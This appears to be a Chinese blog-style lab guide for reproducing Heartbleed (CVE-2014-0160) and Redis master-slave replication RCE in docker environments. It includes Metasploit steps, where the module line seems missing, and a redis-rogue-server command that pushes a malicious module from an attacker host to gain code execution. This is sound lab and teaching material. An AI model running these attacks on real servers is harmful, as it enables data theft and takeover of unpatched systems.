OpenSSL

OpenSSL 心脏滴血漏洞 CVE-2014-0160

漏洞描述

2014年4月7日,OpenSSL发布安全公告,在OpenSSL 1.0.1 ~ 1.0.1f Beta1版本中存在漏洞,漏洞名为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。

影响版本

OpenSSL 1.0.11.0.1a1.0.1b1.0.1c1.0.1d1.0.1e1.0.1fBeta 1 of OpenSSL 1.0.2等。

复现思路

漏洞复现

环境搭建:

git clone https://github.com/vulhub/vulhub.git
cd vulhub/openssl/heartbleed
docker-compose up -d

使用msf对目标进行攻击:

msfconsole
set RHOST <ip>
set verbose true
run

Redis

Redis 主从复制RCE

漏洞描述

在2019年7月7日结束的WCTF2019 Final上,LC/BC成员Pavel Toporkov在分享会上介绍了一种关于Redis新版本的RCE利用方式,比起以前的利用方式来说,这种利用方式更为通用,危害也更大。

Pavel Toporkov的分享:

15-redis-post-exploitation.pdf (zeronights.ru)

影响版本

Redis <= 5.0.5

复现思路

漏洞复现

环境搭建:

docker pull a1143535418/redis5.0
docker run -p 6379:6379 -d a1143535418/redis5.0 redis-server

利用脚本:

n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE (github.com)

python3 redis-rogue-server.py --rhost <remote-ip> --lhost <local-ip> --exp=exp.so

文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。